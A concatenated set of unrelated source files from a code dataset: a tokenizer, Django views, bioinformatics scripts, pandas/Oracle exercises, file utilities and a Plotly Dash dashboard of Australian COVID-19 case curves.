tokenIndex += 1\n\n # text processor\n helper = []\n while is_ABC(ch) and i < length:\n tokenHandled = True\n helper.append(ch)\n i += 1\n if i < length:\n ch = in_str[i]\n\n if len(helper) > 0:\n token_list.append(''.join(helper))\n tokenIndex += 1\n\n # discard unknown token?\n if not tokenHandled:\n token_list.append(ch)\n i += 1 # skip\n\n return token_list\n\n # remove spaces from a list of tokens\n def filter_spaces(self, token_list: List[str]) -> List[str]:\n new_token_list = []\n for token in token_list:\n if token != \" \":\n new_token_list.append(token)\n return new_token_list\n\n # remove punctuation from a set\n def filter_punctuation(self, token_list: List[str]) -> List[str]:\n new_token_list = []\n for token in token_list:\n if token not in self.punc:\n new_token_list.append(token)\n return new_token_list\n\n\n# pretty print a sentence of tokens removing spaces where they're not needed as best as possible\ndef token_list_to_string(token_list: List[Token]):\n list = []\n quote = 0\n for token in token_list:\n text = token.text\n if text in no_space_before: # remove spaces before the current item?\n if len(list) > 0 and list[-1] == ' ':\n list = list[0:-1]\n if text == '\"': # quote counting\n quote += 1\n if text == '\"' and quote % 2 == 0: # end quotes\n if len(list) > 0 and list[-1] == ' ':\n list = list[0:-1]\n list.append(text)\n list.append(\" \")\n elif text == '\"': # start quote\n list.append(text)\n elif text in no_space_after: # no spaces after this token category\n list.append(text)\n else: # all other items\n list.append(text)\n list.append(\" \")\n return ''.join(list)\n","sub_path":"kai/tokenizer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"359397602","text":"from django.shortcuts import render, get_object_or_404, reverse, redirect\nfrom .models import Item, Category\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.db.models.functions import Lower\n\n# Create your views here.\n\n\ndef all_items(request):\n items = Item.objects.all()\n query = 
None\n categories = None\n sort = None\n direction = None\n\n if request.GET:\n if 'sort' in request.GET:\n sortkey = request.GET['sort']\n sort = sortkey\n if sortkey == 'name':\n sortkey = 'lower_name'\n items = items.annotate(lower_name=Lower('name'))\n\n if 'direction' in request.GET:\n direction = request.GET['direction']\n if direction == 'desc':\n sortkey = f'-{sortkey}'\n items = items.order_by(sortkey)\n\n if 'category' in request.GET:\n categories = request.GET['category'].split(',')\n items = items.filter(category__name__in=categories)\n\n categories = Category.objects.filter(name__in=categories)\n\n if 'q' in request.GET:\n query = request.GET['q']\n if not query:\n messages.error(\n request, \"You didn't enter any search criteria!\")\n return redirect(reverse('items'))\n\n queries = Q(name__icontains=query) | Q(\n description__icontains=query)\n items = items.filter(queries)\n\n current_sorting = f'{sort}_{direction}'\n\n context = {\n 'items': items,\n 'search_term': query,\n 'current_categories': categories,\n 'current_sorting': current_sorting,\n }\n\n return render(request, 'items/items.html', context)\n\n\ndef item_detail(request, item_id):\n \"\"\" A view to show individual item details \"\"\"\n\n item = get_object_or_404(Item, pk=item_id)\n\n context = {\n 'item': item,\n }\n\n return render(request, 'items/item_detail.html', context)\n","sub_path":"items/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453847786","text":"import sys\nfrom Bio import SeqIO\nimport json\n\ninput_path=sys.argv[1]\n\nalign_len=len(next(SeqIO.parse(input_path,\"fasta\")).seq)\ntit_pos100_arr_dic=dict((seqr.id,[i for i in range(align_len//100+1) if len(seqr.seq[i*100:i*100+99].strip(\"-\"))])for seqr in SeqIO.parse(input_path,\"fasta\"))\n#json.dump(tit_pos100_arr_dic,open(input_path+\".json\",\"w\"))\n\n\npos100_tit_arr_arr=[[] for i in range(align_len//100+1)]\n\nfor tit,pos100_arr in tit_pos100_arr_dic.items():\n\tfor pos in pos100_arr:\n\t\tpos100_tit_arr_arr[pos]=pos100_tit_arr_arr[pos]+[tit]\njson.dump(pos100_tit_arr_arr,open(input_path+\".json\",\"w\"))\t\n","sub_path":"View_mafft_alignment.py","file_name":"View_mafft_alignment.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"350892829","text":"\ndef revcompl(seq):\n rev = {'A':'T', 'T':'A', 'C':'G', 'G':'C'}\n return ''.join(rev[a] for a in seq)\n\ndef reading(soubor):\n file = open(soubor,'r')\n seq = ''\n for line in file:\n line = line.strip()\n if line[0] != '>':\n seq += line\n\n return seq\n\ndef palindrome(seq, revseq):\n index = []\n for i in range(len(seq)):\n for j in range(12, 2,-1):\n FLAG = True\n if i + j >= len(revseq):\n continue\n if revseq[i + j] == seq[i]:\n\n for k in range(j//2 + (j%2) + 1):\n\n if seq[i + k] != revseq[i + j - k]:\n FLAG = False\n break\n if FLAG:\n print(i + 1,j + 1)\n index.append((i + 1, j + 1))\n\n return index\n\n\n\nseq = reading('input')\nrevstring = revcompl(seq)\n\nprint(seq)\nprint(revstring)\nprint(palindrome(seq, revstring))\n","sub_path":"REVP.py","file_name":"REVP.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"235712051","text":"import os\nfrom sys import argv\n\n_, zipfile = argv\n\nos.system('unzip ' + zipfile)\nfail = False\n\nif not 
os.path.exists(zipfile[:-4] + '/compile.sh'):\n\tfail = True\n\tprint('missing compile.sh')\n\nif not os.path.exists(zipfile[:-4] + '/run.sh'):\n\tfail = True\n\tprint('missing run.sh')\n\nif not os.path.exists(zipfile[:-4] + '/writeup.txt'):\n\tfail = True\n\tprint('missing writeup.txt')\n\nif not os.path.exists(zipfile[:-4] + '/compile_bonus.sh'):\t\n\tprint('missing compile_bonus.sh')\n\nif not os.path.exists(zipfile[:-4] + '/run_bonus.sh'):\t\n\tprint('missing run_bonus.sh')\n\nif not os.path.exists(zipfile[:-4] + '/writeup.pdf'):\t\n\tprint('missing writeup.pdf')\n\nif fail: \n\tprint('========================\\nNOT READY FOR SUBMISSION\\n========================')\nelse:\n\tprint('======\\nPASSED\\n======')\n","sub_path":"src/src2/formatchecker.py","file_name":"formatchecker.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632969032","text":"# NOTE: You must run this script from a terminal console or another script using the os library\n# To Run the Script try the following:\n# python argparse_simple.py -h\n# python argparse_simple.py name Mike\nimport argparse\n\n\ndef process(args):\n name = args.name\n print('*' * 20)\n print('Running...')\n print('Is birthday value %s' % args.is_birthday )\n print('*' * 20)\n if (args.is_birthday == 'Y'):\n print('Happy Birthday %s!' % name)\n else:\n print('Hello, %s.' % name)\n\n\ndef run():\n # Sets up the parser with a description for help\n # If you call this with -h or --help, it will automatically show this description and exit\n parser = argparse.ArgumentParser(description=\"Simple argparse! Prints Hello or Dynamic Messages based on having the correct arguments.\")\n\n # Add in a positional argument. 
These are mandatory, so if you don't include it, it won't work\n parser.add_argument('name', help=\"your name for saying hello to\")\n\n # Add in an optional argument.\n # For now use simple Y or N\n parser.add_argument('--is_birthday', help=\"True or False if it's your birthday today (Y or N)\")\n\n # Parse the arguments and determine if it can proceed, or exit if it's help\n args = parser.parse_args()\n\n # Print the Args\n print('Here are the args...')\n print(args)\n\n # Take all of the captured arguments and send to the run() method for processing\n process(args)\n\n\nif __name__ == '__main__':\n run()\n\n","sub_path":"argparse_simple.py","file_name":"argparse_simple.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"553213033","text":"from __future__ import division\nimport numpy as np\ndef fdcoeffF(k,xbar,x):\n\tn = len(x)\n\tif k >= n:\n\t\traise ArithmeticError(\"The length of x must be larger than k\")\n\n\tm = k\n\tc1 = 1\n\tc4 = x[0] - xbar\n\tc = np.zeros((n-1,m+1))\n\tc[0,0] = 1\n\tfor i in range(0,n-1):\n\t\ti1 = i + 1\n\t\tmn = min(i,m)\n\t\tc2 = 1\n\t\tc5 = c4 \n\t\tc4 = x[i1] - xbar\n\t\tfor j in range(-1,i-1):\n\t\t\tj1 = j + 1\n\t\t\tc3 = x[i1] - x[j1]\n\t\t\tc2 = c2 * c3\n\t\t\tif j == i - 1:\n\t\t\t\tfor s in range(mn-1,0,-1):\n\t\t\t\t\ts1 = s + 1\n\t\t\t\t\tc[i1,s1] = c1*(s*c[i1-1,s1-1] - c5*c[i1-1,s1])/c2\n\t\t\t\tc[i1,1] = -c1*c5*c[i1-1,1]/c2\n\t\t\tfor s in range(mn-1,0,-1):\n\t\t\t\ts1 = s + 1\n\t\t\t\tc[j1,s1] = (c4*c[j1,s1] - s*c[j1,s1-1])/c3 \n\t\t\tc[j1,1] = c4*c[j1,1]/c3\n\t\tc1 = c2\n\treturn c[:,len(c[0]) - 1]\n\n\n","sub_path":"Documents/MATH432/fdstencil.py","file_name":"fdstencil.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"305493708","text":"import matplotlib.pyplot as plt\nimport stregion\n\nimport math\n\ntry:\n from astropy.io import fits as pyfits\nexcept ImportError:\n import pyfits\n\n# At some point, pyfits.Card.fromstring has changed from an unbound\n# method to a bound method.\n\nif pyfits.Card.fromstring.__self__: # \n def pyfits_card_fromstring(l):\n return pyfits.Card.fromstring(l)\nelse:\n def pyfits_card_fromstring(l):\n c = pyfits.Card()\n return c.fromstring(l)\n\ndef demo_header():\n cards = pyfits.CardList()\n for l in open(\"sample_fits01.header\"):\n card = pyfits_card_fromstring(l.strip())\n cards.append(card)\n h = pyfits.Header(cards)\n return h\n\n\ndef show_region(fig, region_list):\n h = demo_header()\n\n n = len(region_list)\n nx = int(math.ceil(n**.5))\n ny = int(math.ceil(1.*n/nx))\n\n\n nrows_ncols = (ny, nx)\n\n grid = [plt.subplot(ny, nx, i+1) for i in range(n)]\n\n for ax, reg_name in zip(grid, region_list):\n ax.set_aspect(1)\n\n r = stregion.open(reg_name).as_imagecoord(h)\n\n patch_list, text_list = r.get_mpl_patches_texts()\n for p in patch_list:\n ax.add_patch(p)\n for t in text_list:\n ax.add_artist(t)\n\n if plt.rcParams[\"text.usetex\"]:\n reg_name = reg_name.replace(\"_\", r\"\\_\")\n ax.set_title(reg_name, size=10)\n for t in ax.get_xticklabels() + ax.get_yticklabels():\n t.set_visible(False)\n\n return grid\n\n","sub_path":"examples/demo_helper.py","file_name":"demo_helper.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"238800268","text":"# coding=utf-8\n'''\nExercise:\nUse aggregate functions (methods of the pandas.Series or pandas.DataFrame classes: count, mean, sum, ...) to\ngroup a DataFrame and extract specific columns\n'''\nimport csv\nimport pandas as pd\nimport cx_Oracle\n\nfrom lab_python.scratch09.ex10 import select_all_from\n\n\ndef peak_to_peak(x):\n return x.max() - x.min()\n\n\nif __name__ == '__main__':\n # connect to the Oracle DB server using a with~as statement\n dsn = cx_Oracle.makedsn('localhost', 1521, 'orcl')\n with cx_Oracle.connect('scott', 'tiger', dsn) as connection:\n # create a cursor object using a with~as statement\n with connection.cursor() as cursor:\n emp_df = select_all_from('emp', cursor)\n # cursor.execute('select * from emp')\n # emp = [row for row in cursor]\n # create the emp_df data frame using (importing) the full-table select function from the scratch09 package\n # file_path = 'emp.csv'\n\n # save emp_df as a csv file (so it can be read back without an Oracle connection)\n # with open(file_path, mode='w', encoding='UTF-8', newline='') as f:\n # writer = csv.writer(f)\n # for item in emp:\n # writer.writerow(item)\n emp_df.to_csv('emp_df.csv', index=False)\n # emp_df = pd.read_csv('emp.csv', header=None)\n # emp_df.columns = ['empno', 'ename', 'job', 'mgr', 'hiredate', 'sal', 'comm', 'deptno']\n # print(emp_df)\n\n # print the average salary per department from emp_df\n g1 = emp_df.groupby(by='DEPTNO')\n emp_sal = g1['SAL']\n print(emp_sal.mean()) # works!\n # print the number of employees per department from emp_df (using the primary key)\n dept_cnt = g1['EMPNO'].count()\n print(dept_cnt)\n # print the minimum salary per department from emp_df\n min_sal = g1['SAL'].min()\n print(min_sal)\n # print the maximum salary per department from emp_df\n max_sal = g1['SAL'].max()\n print(max_sal)\n\n # 1) build a DataFrame! -> deptno is the index! (label)\n all_df = pd.DataFrame({\n 'count': dept_cnt,\n 'mean': emp_sal.mean(),\n 'min': min_sal,\n 'max': max_sal\n })\n print(all_df)\n print(all_df.shape)\n\n # 2) using agg() / aggregate()\n # 2) - 1 : ['function name', 'function name', ...]\n # agg() and aggregate() are identical functions: pass function names as the parameter and they are applied to the groupby object.\n all_df2 = emp_sal.agg(['count', 'mean', 'min', 'max'])\n print(all_df2)\n # when the function is an aggregate function (a method of the pandas.Series or pandas.DataFrame classes: count, mean, sum, ...), pass its name as a string.\n # g1.mean() = g1.agg('mean')\n print(emp_sal.agg(pd.Series.mean)) # <-> print(emp_sal.agg(mean)) error! because there is no function named mean defined (use pd.Series.mean)\n # be careful: not every function name is passed as a string - strictly, the rule is to pass the function itself! - pass user-defined functions directly by name as the parameter (no quotes)\n # ex\n # all_df2 = emp_sal.agg(['count', 'mean', 'min', 'max', 'peak_to_peak']) error!\n # peak_to_peak : write only the function name. peak_to_peak() would call it immediately, so it must not be executed here!\n all_df2 = emp_sal.agg(['count', 'mean', 'min', 'max', peak_to_peak])\n\n # repeat all of the above per job title: employee count, salary mean, min and max\n grouped_by_job = emp_df.groupby('JOB')\n sal_by_job = grouped_by_job['SAL']\n # can also be written as grouped_by_job = emp_df.groupby('JOB')['SAL']\n print(sal_by_job.agg(['count', 'mean', 'min', 'max', peak_to_peak]))\n print(sal_by_job.agg(['count', 'mean', 'min', 'max', lambda x: x.max() - x.min()]))\n # lambda expressions are allowed! 
but the column name then comes out as <lambda>, so it has to be renamed\n # how to set the column names of the DataFrame that agg builds: pass keyword arguments or a dict as the parameter.\n\n # 2) - 2 : keyword argument\n # keyword argument: column_name = function (DataFrame)\n print(sal_by_job.agg(Count='count', Average='mean', Minimum='min', Maximum='max', Range=lambda x: x.max() - x.min()))\n\n # 2) - 3 : dict {'key':'value'}\n # print the employee count, salary mean, min and max per department and job title from emp_df\n # { 'column name': 'function name' }\n # - future warning : this may be removed when the pandas package is upgraded (deprecated); the keyword argument style is preferred over the dict style\n grouped = emp_df.groupby(['DEPTNO', 'JOB'])\n sal_by_dept_job = grouped['SAL']\n df = sal_by_dept_job.agg({\n 'Count': 'count',\n 'Average': 'mean',\n 'Minimum': 'min',\n 'Maximum': 'max',\n 'Range': lambda x: x.max() - x.min()\n })\n print(df)\n\n # 2) - 4 : [('column name', 'function name')]\n # written as tuples inside a list\n # print(result_day_2.agg([('average', 'mean'), ('stddev', 'std'), ('range', peak_to_peak)])) -- there is an example in ex04\n","sub_path":"scratch10/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":5115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"367133264","text":"#!/bin/python\n\nimport os\nimport csv\nimport pandas as pd\n\ncomplete = pd.read_table('../output/hla_complete.tsv')\nwith open('../html/HLA_alleles/ukb_to_asterisk_names.csv', mode='r') as infile:\n reader = csv.reader(infile)\n names_dict = {rows[0]:rows[1] for rows in reader}\n\ncount = 0\nconcordance_tot = 0\n\nfor gbe_id in os.listdir('../output/snpnet/'):\n if \"out\" not in gbe_id:\n bma_alleles = list(complete[(complete['GBE_ID'] == gbe_id) & (complete['BMA_posterior_mean'].notna())].sort_values('BMA_posterior_mean', ascending=False)['allelotype'])\n with open('../output/snpnet/' + gbe_id + '/' + gbe_id + '_snpnet.txt') as f:\n snpnet_alleles = f.read().splitlines()\n to_remove = ['PC' + str(i) for i in range(1, 11)] + ['age', 'sex']\n snpnet_alleles = [allele for allele in snpnet_alleles if allele not in to_remove]\n snpnet_alleles = [allele[:-2] for allele in snpnet_alleles]\n snpnet_alleles = [names_dict[allele] for allele in snpnet_alleles]\n if len(bma_alleles) > 0 and len(snpnet_alleles) > 0:\n count += 1\n print(gbe_id)\n num_alleles = min(len(bma_alleles), len(snpnet_alleles), 10)\n concordance = len(set(bma_alleles[:num_alleles]).intersection(set(snpnet_alleles[:num_alleles])))/float(num_alleles)\n concordance_tot += concordance\n print(concordance)\n print(bma_alleles, snpnet_alleles)\nprint(concordance_tot/count)\n","sub_path":"scripts/compare_bma_snpnet.py","file_name":"compare_bma_snpnet.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"267712247","text":"import shutil\nimport datetime\nimport os\nimport logging\n\ndef copy_file_to_folder(pathFile, dest_path):\n date = datetime.datetime.now().strftime(\"%m%d%Y_%H%M%S\")\n exist = os.path.isfile(dest_path)\n\n if exist:\n log_error(\"file already exists: \" + dest_path)\n return\n \n shutil.copyfile(pathFile, dest_path)\n print(\"file copied to : \" + dest_path)\n\ndef backup_file(pathFile):\n date = datetime.datetime.now().strftime(\"%m%d%Y_%H%M%S\")\n\n dest_file = \"/content/drive/MyDrive/BillardAI/Models/best_\" + date + \".pt\"\n\n exist = os.path.isfile(dest_file)\n\n if exist:\n os.remove(dest_file)\n log_message(\"removed existing file : \" + \"best_\" + date + \".pt\")\n \n shutil.copyfile(pathFile, dest_file)\n log_message(\"file copied to : \" + \"best_\" + date + \".pt\")\n\ndef movefile(pathFile):\n date = datetime.datetime.now().strftime(\"%m%d%Y\")\n dest_file = \"/content/drive/MyDrive/BillardAI/Models/best_\" + date + \".pt\"\n exist = os.path.isfile(dest_file)\n\n if exist:\n os.remove(dest_file)\n log_message(\"removed existing file : \" + \"best_\" + date + \".pt\")\n \n shutil.move(pathFile, dest_file)\n log_message(\"file moved to : \" + \"best_\" + date + \".pt\")\n\n \ndef zipdir(zipFolder):\n date = datetime.datetime.now().strftime(\"%m%d%Y\")\n output_filename = zipFolder + \"label_\" + date + \".zip\"\n shutil.make_archive(output_filename, 'zip', zipFolder)\n\ndef unzip(zipFile):\n # unzip dataset\n if not os.path.isfile(zipFile):\n log_error(\"The zip file was not found !!!\")\n return 0\n shutil.unpack_archive(zipFile, \"/content/Dataset\")\n log_message(\"The file has been unzipped.\")\n return 1\n\ndef log_error(message, *arguments):\n prefix = colorstr('red', 'bold', 'Error:')\n print(f\"{prefix} {message}\", *arguments)\n\n\ndef log_message(message):\n prefix = colorstr('green', 'bold', 'Message:')\n print(f\"{prefix} {message}\")\n\ndef colorstr(*input):\n *args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string\n colors = {'black': '\\\\033[30m', # basic colors\n 'red': '\\\\033[31m',\n 'green': '\\\\033[32m',\n 'yellow': '\\\\033[33m',\n 'blue': '\\\\033[34m',\n 'magenta': '\\\\033[35m',\n 'cyan': '\\\\033[36m',\n 'white': '\\\\033[37m',\n 'bright_black': '\\\\033[90m', # bright colors\n 'bright_red': '\\\\033[91m',\n 'bright_green': '\\\\033[92m',\n 'bright_yellow': '\\\\033[93m',\n 'bright_blue': '\\\\033[94m',\n 'bright_magenta': '\\\\033[95m',\n 'bright_cyan': '\\\\033[96m',\n 'bright_white': '\\\\033[97m',\n 'end': '\\\\033[0m', # misc\n 'bold': '\\\\033[1m',\n 'underline': '\\\\033[4m'}\n return ''.join(colors[x] for x in args) + f'{string}' + colors['end']\n\ndef mkdir(path):\n if not os.path.isdir(path):\n os.mkdir(path)\n return 1\n\n log_error(f\"The path {path} already exists !\" )\n return 0","sub_path":"ultils/ultils.py","file_name":"ultils.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"419607625","text":"import copy\nfrom io import BytesIO\nfrom typing import Optional, List\nfrom typing import Union\n\nfrom .cookies import Cookie\nfrom .headers import Headers\nfrom .http_status import HttpStatus\n\n\nclass HttpResponse:\n def __init__(\n self,\n status: Union[int, HttpStatus] = HttpStatus.OK,\n body: Union[bytes, bytearray, str, None] = None,\n encoding: str = \"utf-8\",\n headers: Optional[Union[dict, Headers]] = None,\n ):\n self._headers = headers if isinstance(headers, Headers) else Headers(headers)\n self.status_code = status\n self.body = BytesIO()\n self.encoding = encoding\n self.cookies: List[Cookie] = []\n\n if body:\n self.write(body)\n\n @property\n def headers(self):\n headers: Headers = copy.copy(self._headers)\n for cookie in self.cookies:\n headers.set(*cookie.header())\n return headers\n\n def write(self, body: Union[str, bytes, bytearray]) -> None:\n if isinstance(body, str):\n self.body.write(body.encode(self.encoding))\n else:\n self.body.write(body)\n\n @property\n def writable(self):\n return not self.body.closed\n\n def close(self):\n self.body.close()\n\n def __str__(self):\n self.body.seek(0)\n return self.body.read().decode(self.encoding)\n\n\n__all__ = 
[\"HttpResponse\"]\n","sub_path":"chocs/http_response.py","file_name":"http_response.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"579409725","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 8 20:33:42 2021\n\n@author: Jiwoo Ahn\n\"\"\"\n\nimport pandas as pd\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output \nfrom datetime import timedelta\nfrom datetime import date as dtdate\n\n# Import relevant libraries\nimport pandas as pd\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\n\n# Initiate the app\nexternal_stylesheets = [\"https://codepen.io/chriddyp/pen/bWLwgP.css\"]\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.title = 'AusCovidDash'\n\ncolors = {\n 'background': '#000000',\n 'text': '#5d76a9',\n 'label': '#f5b112'\n}\n\n# Pull data from John Hopkins University and organise into dataframe \ndf = pd.read_csv('https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\n\n# Curve fitting Global COVID-19 Cases\nglobal max_date\nmax_date = dtdate.today() - timedelta(days=7)\n\ndef logistic(t, a, b, c, d):\n return c + (d - c)/(1 + a * np.exp(- b * t))\n\ndef exponential(t, a, b, c):\n return a * np.exp(b * t) + c\n \ndef doubling(t):\n return (1+np.log(2)/2)**t\n\ndef plotCases(dataframe, column, state, start_date, curvefit, forecast):\n\n #fig = go.Figure()\n fig = make_subplots(rows=1,cols=2,subplot_titles=('Total Cases','New Cases'))\n fig.update_layout(template='ggplot2')\n fig.update_layout(autosize=True,margin={'t':30})\n #fig.update_layout(title='Australia Covid-19 Dashboard',title_font_size=30,title_x=0.5) \n fig.update_layout(legend={'title':'Legend','bordercolor':'black','borderwidth':1})\n fig.update_layout(legend_title_font=dict(family=\"Verdana\",size=16,color=colors['text']))\n \n fig.update_layout(\n font=dict(\n family=\"Verdana\",\n size=12,\n color=colors['text']\n ))\n\n # PSM_ColorMap = [(0,0,0),\n # (27/256,38/256,100/256),\n # (245/256,130/256,100/256),\n # (134/256,200/256,230/256),\n # (210/256,210/256,185/256),\n # (74/256,93/256,206/256),\n # (249/256,180/256,161/256),\n # (16/256,23/256,60/256),\n # (194/256,50/256,13/256),\n # (37/256,136/256,181/256),\n # (144/256,144/256,93/256)]\n \n co = dataframe[dataframe[column] == state].iloc[:,4:].T.sum(axis = 1)\n co = pd.DataFrame(co)\n co.columns = ['Cases']\n co['date'] = co.index\n co['date'] = pd.to_datetime(co['date']) \n mask = (co['date'] >= start_date)\n co = co.loc[mask]\n co['Cases'] = co['Cases'] - co['Cases'][0]\n \n y = np.array(co['Cases'])\n x = np.arange(y.size)\n date = co['date']\n \n x2 = np.arange(y.size+forecast)\n x3 = np.arange(y.size+forecast+100)\n \n date2 = pd.date_range(date[0],freq='1d',periods=len(date)+forecast)\n \n fig.add_trace(go.Scatter(x=date,y=y,mode='markers',name='Total Cases',marker_color='rgba(27,38,100,.8)'),row=1,col=1)\n\n # Logistic regression -----------------------------------------------------------------------\n lpopt, lpcov = curve_fit(logistic, x, y, maxfev=10000)\n #lerror = np.sqrt(np.diag(lpcov))\n # for logistic curve at half maximum, slope = growth rate/2. 
so doubling time = ln(2) / (growth rate/2)\n ldoubletime = np.log(2)/(lpopt[1]/2)\n ## standard error\n #ldoubletimeerror = 1.96 * ldoubletime * np.abs(lerror[1]/lpopt[1])\n \n # calculate R^2\n residuals = y - logistic(x, *lpopt)\n ss_res = np.sum(residuals**2)\n ss_tot = np.sum((y - np.mean(y))**2)\n logisticr2 = 1 - (ss_res / ss_tot) \n \n if logisticr2 >= 0 and logisticr2 <= 1:\n fig.add_trace(go.Scatter(x=date2,y=logistic(x2, *lpopt), mode='lines', name=\"Logistic (r2={0}) Td={1}d\".format(round(logisticr2,2),round(ldoubletime,1)),line_color='rgba(245,130,100,.8)',line_shape='spline',line_dash='dash'),row=1,col=1)\n # -----------------------------------------------------------------------\n \n \n # Exponential regression--------------------------------------------------------------------\n epopt, epcov = curve_fit(exponential, x, y, bounds=([0.99,0,-0.001],[1.01,0.9,0.001]), maxfev=10000)\n #eerror = np.sqrt(np.diag(epcov))\n \n # for exponential curve, slope = growth rate. so doubling time = ln(2) / growth rate\n edoubletime = np.log(2)/epopt[1]\n ## standard error\n #edoubletimeerror = 1.96 * edoubletime * np.abs(eerror[1]/epopt[1])\n \n # calculate R^2\n residuals = y - exponential(x, *epopt)\n ss_res = np.sum(residuals**2)\n ss_tot = np.sum((y - np.mean(y))**2)\n expr2 = 1 - (ss_res / ss_tot)\n \n if expr2 >= 0 and expr2 <= 1:\n fig.add_trace(go.Scatter(x=date2,y=exponential(x2, *epopt), mode='lines', name=\"Exponential (r2={0}) Td={1}d\".format(round(expr2,2),round(edoubletime,1)),line_color='rgba(134,200,230,.8)',line_shape='spline',line_dash='dash'),row=1,col=1)\n # --------------------------------------------------------------------\n\n # Calculations for new cases\n delta = np.diff(co['Cases'])\n fig.add_trace(go.Scatter(x=y[1:],y=delta,mode='lines',name='New Daily Cases',line_color='rgba(210,210,185,.8)'),row=1,col=2)\n \n dbl_cases = 2**(x3/2)\n dbl_delta = 0.5*np.log(2)*np.exp((np.log(2)*x3)/2)\n fig.add_trace(go.Scatter(x=dbl_cases,y=dbl_delta,mode='lines',name='2 Day Doubling Time',line = {'color':'black','dash':'dash'}),row=1,col=2)\n \n fig.update_xaxes(showline=True, linewidth=1, linecolor='black', mirror=True)\n fig.update_yaxes(showline=True, linewidth=1, linecolor='black', mirror=True)\n \n fig.update_xaxes(title_text='Date',fixedrange=True,row=1,col=1)\n fig.update_yaxes(title_text='Total confirmed cases since {0}'.format(start_date),fixedrange=True,row=1,col=1)\n \n fig.update_xaxes(title_text='Total confirmed cases since {0}'.format(start_date),range=[0,np.log10(max(y)+100)],type=\"log\",fixedrange=True,row=1,col=2)\n fig.update_yaxes(title_text='New daily cases',type=\"log\",range=[0,np.log10(max(delta)+100)],fixedrange=True,row=1,col=2)\n \n return fig\n \naus_states = ['Queensland','New South Wales','Victoria','Western Australia','South Australia', 'Tasmania', 'Australian Capital Territory']\n\n\n\napp.layout = html.Div([\n html.H1(children='Australia Covid-19 Dashboard',\n style={'textAlign': 'center','font-family':'Verdana','color': colors['text'],'padding-top': 20}),\n html.P(children='''Graph settings''',\n style={'textAlign': 'center','font-size':24,'font-family':'Verdana','color': colors['text'],'padding-bottom': 10}),\n html.Div([html.Label([\"State\",dcc.Dropdown(id='state-select', options=[{'label': i, 'value': i} for i in aus_states],\n value='Queensland', style={'width': '250px', 'display':'inline-block', 'margin-left':'10px','vertical-align':'middle'})])],\n 
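# dropdown for choosing which Australian state is plotted\n 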
style={'vertical-align':'middle','margin-top':'10px','font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']}),\n    html.Div([\n        html.Label(["Start Date",dcc.DatePickerSingle(id='my-date-picker-single',\n            min_date_allowed=dtdate(2020, 1, 22),\n            max_date_allowed=(max_date),\n            initial_visible_month=dtdate(2021, 1, 1),\n            date=dtdate(2021, 1, 1),style={'display':'inline-block', 'margin-left':'10px'})])],style={'vertical-align':'middle','margin-top':'10px','font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']}),\n    dcc.Graph('dashboard', figure={"layout" : {"height":600}},config={'displayModeBar': False}),\n    html.Div(dcc.Markdown('''\n    The total cases chart presents all COVID-19 cases in each state since the specified start date, as a function of time. Logistic and exponential regression indicate potential trajectories of growth.\n\n    The new cases chart presents the daily increase in COVID-19 cases vs. the total confirmed cases to date. When plotted in this way, exponential growth is represented as a straight line that slopes upwards.\n\n\n    _Created by : Jiwoo Ahn_\n\n    Data provided by Johns Hopkins University (updated daily around 00:00 UTC / 20:00 ET)\n\n    [Github Repo](https://github.com/j-ahn/AusCovidDash)\n\n    '''), style = {'font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']}),\n    html.Div(children=('Last updated : {0}'.format(dtdate.today().strftime('%d-%B-%Y'))),\n             style = {'font-size':10,'font-family':'Verdana','textAlign':'center','color':colors['text']})\n    ])\n\n@app.callback(\n    Output('dashboard', 'figure'),\n    [Input('state-select', 'value')],\n    [Input('my-date-picker-single','date')]\n)\ndef update_graph(value,date_value):\n    global max_date\n    max_date = dtdate.today() - timedelta(days=7)\n    # Pull data from Johns Hopkins University and organise into dataframe\n    df = pd.read_csv('https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv')\n    return plotCases(df, 'Province/State', value, date_value, True, 3)\n\nif __name__ == '__main__':\n    